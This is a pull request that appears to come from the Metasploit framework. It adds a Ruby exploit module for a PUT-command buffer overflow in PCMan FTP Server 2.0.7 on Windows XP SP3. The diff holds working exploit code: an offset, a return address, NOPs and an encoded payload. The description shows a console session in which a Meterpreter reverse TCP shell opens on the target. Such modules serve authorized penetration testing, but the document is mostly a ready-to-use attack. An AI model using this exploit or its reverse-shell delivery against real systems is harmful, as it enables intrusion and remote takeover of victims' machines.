### PR TITLE
Added PCMan FTP PUT Buffer Overflow Exploit

### DIFF
--- a/modules/exploits/windows/ftp/pcman_put.rb
+++ b/modules/exploits/windows/ftp/pcman_put.rb
@@ -5,14 +5,14 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Exploit::Remote
+class Metasploit4 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::Ftp
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'PCMAN FTP Server v2.0.7 Buffer Overflow - PUT Command',
+      'Name'           => 'PCMAN FTP Server Buffer Overflow - PUT Command',
       'Description'    => %q{
           This module exploits a buffer overflow vulnerability found in the PUT command of the
           PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
@@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
           [
-            'Jay Turla @shipcod3',      # Initial Discovery
-            'Chris Higgins @ch1gg1ns'   # msf Module
+            'Jay Turla',      # Initial Discovery -- @shipcod3
+            'Chris Higgins'   # msf Module -- @ch1gg1ns
           ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -30,8 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'process',
-          'VERBOSE'  => true
+          'EXITFUNC' => 'process'
         },
       'Payload'        =>
         {
@@ -57,9 +56,9 @@ class Metasploit3 < Msf::Exploit::Remote
     disconnect
 
     if /220 PCMan's FTP Server 2\.0/ === banner
-      return Exploit::CheckCode::Appears
+      Exploit::CheckCode::Appears
     else
-      return Exploit::CheckCode::Safe
+      Exploit::CheckCode::Safe
     end
   end
 

--- a/modules/exploits/windows/ftp/pcman_put.rb
+++ b/modules/exploits/windows/ftp/pcman_put.rb
@@ -26,7 +26,8 @@ class Metasploit4 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'EDB',   '37731']
+          [ 'EDB',   '37731'],
+          [ 'OSVDB',   '94624']
         ],
       'DefaultOptions' =>
         {

--- a/modules/exploits/windows/ftp/pcman_put.rb
+++ b/modules/exploits/windows/ftp/pcman_put.rb
@@ -1,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PCMAN FTP Server v2.0.7 Buffer Overflow - PUT Command',
+      'Description'    => %q{
+          This module exploits a buffer overflow vulnerability found in the PUT command of the
+          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
+          credientials are enabled.
+      },
+      'Author'         =>
+          [
+            'Jay Turla @shipcod3',      # Initial Discovery
+            'Chris Higgins @ch1gg1ns'   # msf Module
+          ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB',   '37731']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+          'VERBOSE'  => true
+        },
+      'Payload'        =>
+        {
+          'Space'   => 1000,
+          'BadChars'  => "\x00\x0A\x0D",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3 English',
+            {
+              'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
+              'Offset' => 2007
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Aug 07 2015',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    connect_login
+    disconnect
+
+    if /220 PCMan's FTP Server 2\.0/ === banner
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    connect_login
+
+    print_status('Generating payload...')
+    sploit = rand_text_alpha(target['Offset'])
+    sploit << [target.ret].pack('V')
+    sploit << make_nops(16)
+    sploit << payload.encoded
+
+    send_cmd( ["PUT", sploit], false )
+    disconnect
+  end
+
+end


### PR DESCRIPTION
Exploit to cause a buffer overflow in the PUT command on PCMan FTP Server 2.0.7 running on Windows XP SP3. You can check out the PoC Python exploit and grab the vulnerable application from the [Exploit DB page](https://www.exploit-db.com/exploits/37731/)

Pretty simple exploit, nothing too complicated. To replicate, just download the vulnerable app, run the EXE, and fire off the module at it.

```
msf > use exploit/windows/ftp/pcman_put 
msf exploit(pcman_put) > set rhost 172.16.237.129
msf exploit(pcman_put) > show options

Module options (exploit/windows/ftp/pcman_put):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    172.16.237.129       yes       The target address
   RPORT    21                   yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.237.1     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 English


msf exploit(pcman_put) > exploit

[*] Started reverse TCP handler on 172.16.237.1:4444 
[*] Connecting to FTP server...
[*] Connecting to FTP server 172.16.237.129:21...
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password mozilla@example.com...
[*] Sending password...
[*] Generating payload...
[*] Sending stage (957487 bytes) to 172.16.237.129
[*] Meterpreter session 10 opened (172.16.237.1:4444 -> 172.16.237.129:1036) at 2016-01-26 16:58:04 -0600

meterpreter >
```
